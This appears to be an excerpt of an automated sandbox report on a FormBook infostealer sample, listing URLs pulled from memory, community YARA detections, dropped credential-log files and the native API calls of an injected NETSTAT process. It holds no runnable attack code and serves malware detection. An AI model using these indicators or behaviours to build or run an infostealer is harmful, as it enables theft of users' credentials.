Source: NETSTAT.EXE, 00000005.00000002.850897333.0000000000949000.00000004.00000001.sdmp, String found in binary or memory: http://www.flycoz.com
Source: NETSTAT.EXE, 00000005.00000002.850897333.0000000000949000.00000004.00000001.sdmp, String found in binary or memory: http://www.flycoz.com/te/
Source: druS9vVaUK.exe, 00000000.00000003.423851257.000000000517B000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: druS9vVaUK.exe, 00000000.00000002.448671243.0000000005372000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: druS9vVaUK.exe, 00000000.00000002.448671243.0000000005372000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: druS9vVaUK.exe, 00000000.00000002.448671243.0000000005372000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: druS9vVaUK.exe, 00000000.00000002.448671243.0000000005372000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmp, String found in binary or memory: http://www.google.ch/
Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmp, String found in binary or memory: http://www.google.ch/1
Source: NETSTAT.EXE, 00000005.00000003.769957339.0000000000230000.00000004.00000001.sdmp, String found in binary or memory: http://www.google.ch/1T?
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://www.isolb.net/Best_Penny_Stocks.cfm?fp=mk4biGGtTPOeRjpJ5Czof7fB3P0OahiLQhEqISnL291F44tz9cT0lf
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://www.isolb.net/Dental_Plans.cfm?fp=mk4biGGtTPOeRjpJ5Czof7fB3P0OahiLQhEqISnL291F44tz9cT0lfgLwW5
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://www.isolb.net/High_Speed_Internet.cfm?fp=mk4biGGtTPOeRjpJ5Czof7fB3P0OahiLQhEqISnL291F44tz9cT0
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://www.isolb.net/Top_Smart_Phones.cfm?fp=mk4biGGtTPOeRjpJ5Czof7fB3P0OahiLQhEqISnL291F44tz9cT0lfg
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://www.isolb.net/display.cfm
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://www.isolb.net/fashion_trends.cfm?fp=mk4biGGtTPOeRjpJ5Czof7fB3P0OahiLQhEqISnL291F44tz9cT0lfgLw
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://www.isolb.net/find_a_tutor.cfm?fp=mk4biGGtTPOeRjpJ5Czof7fB3P0OahiLQhEqISnL291F44tz9cT0lfgLwW5
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://www.isolb.net/music_videos.cfm?fp=mk4biGGtTPOeRjpJ5Czof7fB3P0OahiLQhEqISnL291F44tz9cT0lfgLwW5
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://www.isolb.net/px.js?ch=1
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://www.isolb.net/px.js?ch=2
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://www.isolb.net/sk-logabpstatus.php?a=SWR5WDVXc001eDhjT2U2MDZtMmFraXQrdXJWVGYvMUVGTGwvVkMzeWdwe
Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmp, String found in binary or memory: http://www.isolb.net/te/?1bm41T=mVrXCCC1UxiLkFcyo0UiEujr6Tcj2iygFeKfTYkHGEjYfWW5ml4nmy0cK0afZAsSueXT
Source: druS9vVaUK.exe, 00000000.00000002.448671243.0000000005372000.00000004.00000001.sdmp, druS9vVaUK.exe, 00000000.00000003.433122078.0000000005163000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: druS9vVaUK.exe, 00000000.00000003.433122078.0000000005163000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/ET$
Source: druS9vVaUK.exe, 00000000.00000003.433122078.0000000005163000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/NT
Source: druS9vVaUK.exe, 00000000.00000003.433122078.0000000005163000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: druS9vVaUK.exe, 00000000.00000003.433122078.0000000005163000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/bT9
Source: druS9vVaUK.exe, 00000000.00000003.433122078.0000000005163000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/jT1
Source: druS9vVaUK.exe, 00000000.00000003.433122078.0000000005163000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: druS9vVaUK.exe, 00000000.00000003.433122078.0000000005163000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/1T
Source: druS9vVaUK.exe, 00000000.00000003.433122078.0000000005163000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/yT
Source: druS9vVaUK.exe, 00000000.00000003.433122078.0000000005163000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/pTW
Source: druS9vVaUK.exe, 00000000.00000003.433122078.0000000005163000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/r
Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmp, String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmp, String found in binary or memory: http://www.msn.com/?ocid=iehp141
Source: NETSTAT.EXE, 00000005.00000003.769957339.0000000000230000.00000004.00000001.sdmp, String found in binary or memory: http://www.msn.com/?ocid=iehp4q
Source: NETSTAT.EXE, 00000005.00000003.770046562.0000000000247000.00000004.00000001.sdmp, String found in binary or memory: http://www.msn.com/?ocid=iehpLMEM
Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmp, String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMhx
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehps
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/ocid=iehp
          Source: druS9vVaUK.exe, 00000000.00000003.423851257.000000000517B000.00000004.00000001.sdmp, druS9vVaUK.exe, 00000000.00000002.448671243.0000000005372000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: druS9vVaUK.exe, 00000000.00000003.423851257.000000000517B000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comn-u
          Source: druS9vVaUK.exe, 00000000.00000003.423851257.000000000517B000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comp
          Source: druS9vVaUK.exe, 00000000.00000003.423851257.000000000517B000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comr-c#
          Source: druS9vVaUK.exe, 00000000.00000002.448671243.0000000005372000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: druS9vVaUK.exe, 00000000.00000002.448671243.0000000005372000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: druS9vVaUK.exe, 00000000.00000002.448671243.0000000005372000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: druS9vVaUK.exe, 00000000.00000002.448671243.0000000005372000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.482493233.000000000CCF6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: NETSTAT.EXE, 00000005.00000002.848139902.0000000000224000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&http
          Source: NETSTAT.EXE, 00000005.00000003.770046562.0000000000247000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
          Source: NETSTAT.EXE, 00000005.00000002.848139902.0000000000224000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1u
          Source: NETSTAT.EXE, 00000005.00000002.848139902.0000000000224000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1
          Source: NETSTAT.EXE, 00000005.00000002.852651338.0000000003278000.00000004.00000001.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?hl=en&origin=https%3A%2F%2Fwww.google.ch&pid=1&spid=1&prid=190
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: https://ogs.google.com/widget/callouthl=en&origin=https%3A%2F%2Fwww.google.ch&pid=1&spid=1&prid=1901
          Source: NETSTAT.EXE, 00000005.00000002.851072744.0000000000C3F000.00000004.00000001.sdmpString found in binary or memory: https://www.domain.com/controlpanel/domaincentral/3.0/
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: https://www.google.ch/?gws_rd=ssl
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: https://www.google.ch/?gws_rd=sslLMEMh
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: https://www.google.ch/?gws_rd=sslp
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: https://www.google.ch/favicon.ico
          Source: NETSTAT.EXE, 00000005.00000002.848389605.0000000000233000.00000004.00000001.sdmpString found in binary or memory: https://www.google.ch/gws_rd=ssl

          Source: druS9vVaUK.exe, 00000000.00000002.444726602.0000000000C90000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, File source: 00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.501038766.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.852694551.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.499850983.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.453585348.0000000009125000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 2.2.druS9vVaUK.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.druS9vVaUK.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Detected FormBook malware
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Dropped file: C:\Users\user\AppData\Roaming\940NNO9F\940logri.ini
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Dropped file: C:\Users\user\AppData\Roaming\940NNO9F\940logrf.ini
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Dropped file: C:\Users\user\AppData\Roaming\940NNO9F\940logrv.ini
          Malicious sample detected (through community Yara rule)
          Source: 00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.847404146.00000000001D0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.501814607.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.501038766.0000000000A90000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.501038766.0000000000A90000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.852694551.00000000032A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.852694551.00000000032A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.499850983.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.499850983.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.453585348.0000000009125000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.453585348.0000000009125000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.druS9vVaUK.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.2.druS9vVaUK.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.druS9vVaUK.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.2.druS9vVaUK.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: C:\Windows\SysWOW64\NETSTAT.EXE, Process Stats: CPU usage > 98%
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00BCABCE NtQuerySystemInformation,0_2_00BCABCE
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00BCAA5E NtQueryInformationProcess,0_2_00BCAA5E
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00BCAB93 NtQuerySystemInformation,0_2_00BCAB93
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 0_2_00BCAA3C NtQueryInformationProcess,0_2_00BCAA3C
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 2_2_00416BC0 NtCreateFile,2_2_00416BC0
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 2_2_00416C70 NtReadFile,2_2_00416C70
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 2_2_00416CF0 NtClose,2_2_00416CF0
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 2_2_00416DA0 NtAllocateVirtualMemory,2_2_00416DA0
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 2_2_00416BBA NtCreateFile,2_2_00416BBA
          Source: C:\Users\user\Desktop\druS9vVaUK.exeCode function: 2_2_00416C12 NtReadFile,2_2_00416C12
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA350 NtQueryValueKey,LdrInitializeThunk,5_2_034BA350
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA360 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_034BA360
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA310 NtEnumerateValueKey,LdrInitializeThunk,5_2_034BA310
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA3D0 NtCreateKey,LdrInitializeThunk,5_2_034BA3D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA3E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_034BA3E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA240 NtReadFile,LdrInitializeThunk,5_2_034BA240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA260 NtWriteFile,LdrInitializeThunk,5_2_034BA260
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA2D0 NtClose,LdrInitializeThunk,5_2_034BA2D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA800 NtSetValueKey,LdrInitializeThunk,5_2_034BA800
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA750 NtCreateFile,LdrInitializeThunk,5_2_034BA750
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA610 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_034BA610
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA6A0 NtCreateSection,LdrInitializeThunk,5_2_034BA6A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA540 NtDelayExecution,LdrInitializeThunk,5_2_034BA540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA560 NtQuerySystemInformation,LdrInitializeThunk,5_2_034BA560
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA470 NtSetInformationFile,LdrInitializeThunk,5_2_034BA470
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA410 NtQueryInformationToken,LdrInitializeThunk,5_2_034BA410
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BACE0 NtCreateMutant,LdrInitializeThunk,5_2_034BACE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA480 NtMapViewOfSection,LdrInitializeThunk,5_2_034BA480
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA370 NtQueryInformationProcess,5_2_034BA370
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03479305 NtClose,NtClose,5_2_03479305
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034FA32E NtQueryInformationProcess,NtMapViewOfSection,NtClose,5_2_034FA32E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A6B3E NtDelayExecution,5_2_034A6B3E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0347C330 NtQueryValueKey,NtQueryValueKey,5_2_0347C330
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034F63A6 NtWaitForSingleObject,NtClose,5_2_034F63A6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034F4BBE NtQuerySystemInformation,5_2_034F4BBE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_035343A4 NtAllocateVirtualMemory,5_2_035343A4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034AEA6E NtAllocateVirtualMemory,5_2_034AEA6E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03475275 NtClose,NtClose,NtClose,NtClose,5_2_03475275
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034FA27C NtQueryVirtualMemory,5_2_034FA27C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03479210 NtClose,NtClose,5_2_03479210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A6A2B NtFreeVirtualMemory,NtFreeVirtualMemory,5_2_034A6A2B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA220 NtWaitForSingleObject,5_2_034BA220
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A523D NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtAllocateVirtualMemory,5_2_034A523D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BBA30 NtSetContextThread,5_2_034BBA30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03471AC0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,5_2_03471AC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A22C3 NtAllocateVirtualMemory,NtAllocateVirtualMemory,5_2_034A22C3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0350B2C0 NtAdjustPrivilegesToken,NtAdjustPrivilegesToken,NtClose,NtClose,5_2_0350B2C0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0353F2C5 NtFreeVirtualMemory,5_2_0353F2C5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA2F0 NtQueryInformationFile,5_2_034BA2F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034F3284 NtQueryValueKey,NtQueryValueKey,5_2_034F3284
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0347EAA0 NtClose,5_2_0347EAA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_035012B9 NtAllocateVirtualMemory,5_2_035012B9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034942B0 NtClose,5_2_034942B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0353F969 NtQueryVirtualMemory,5_2_0353F969
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A7110 NtQueryInformationProcess,NtQueryInformationProcess,5_2_034A7110
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03488123 NtProtectVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,5_2_03488123
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0353A9DE NtFreeVirtualMemory,5_2_0353A9DE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034B51C6 NtQueryValueKey,NtClose,5_2_034B51C6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0353F1DD NtFreeVirtualMemory,5_2_0353F1DD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034751E0 NtClose,NtClose,NtClose,5_2_034751E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_035011AC NtWaitForSingleObject,NtClose,5_2_035011AC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03535053 NtProtectVirtualMemory,5_2_03535053
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034F7866 NtProtectVirtualMemory,5_2_034F7866
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0353E822 NtFreeVirtualMemory,5_2_0353E822
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A48CB NtAllocateVirtualMemory,5_2_034A48CB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034AC0D7 NtProtectVirtualMemory,5_2_034AC0D7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034870E9 NtMapViewOfSection,NtUnmapViewOfSection,5_2_034870E9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0352B89B NtAllocateVirtualMemory,5_2_0352B89B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_035408A5 NtQueryVirtualMemory,5_2_035408A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BB0B0 NtGetContextThread,5_2_034BB0B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0347A740 NtClose,NtClose,5_2_0347A740
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034F2F40 NtQueryValueKey,NtClose,5_2_034F2F40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03541746 NtFreeVirtualMemory,5_2_03541746
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03487F74 NtProtectVirtualMemory,NtProtectVirtualMemory,5_2_03487F74
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA700 NtProtectVirtualMemory,5_2_034BA700
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA710 NtQuerySection,5_2_034BA710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0353DF39 NtQueryVirtualMemory,NtQueryVirtualMemory,5_2_0353DF39
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA720 NtResumeThread,5_2_034BA720
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0352F722 NtQueryInformationProcess,5_2_0352F722
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03501724 NtQueryInformationProcess,5_2_03501724
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0352B7FA NtAllocateVirtualMemory,5_2_0352B7FA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03487781 NtProtectVirtualMemory,5_2_03487781
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA780 NtOpenDirectoryObject,5_2_034BA780
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03495790 NtAllocateVirtualMemory,NtAllocateVirtualMemory,5_2_03495790
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03500FB0 NtQuerySystemInformation,NtClose,5_2_03500FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0353FFAC NtQueryVirtualMemory,5_2_0353FFAC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034ADE50 NtQueryInformationProcess,5_2_034ADE50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA650 NtQueueApcThread,5_2_034BA650
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03523660 NtQueryVirtualMemory,5_2_03523660
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_0350BE30 NtAdjustPrivilegesToken,NtClose,NtClose,5_2_0350BE30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034ACE34 NtClose,5_2_034ACE34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034BA6D0 NtCreateProcessEx,5_2_034BA6D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03525EFB NtQueryValueKey,NtClose,5_2_03525EFB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034F76FC NtQueryVirtualMemory,5_2_034F76FC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03533E96 NtAllocateVirtualMemory,5_2_03533E96
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03501689 NtQueryInformationProcess,5_2_03501689
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_035016B6 NtQueryInformationProcess,5_2_035016B6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_034A46A4 NtQueryInformationProcess,5_2_034A46A4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03472EBF NtClose,5_2_03472EBF
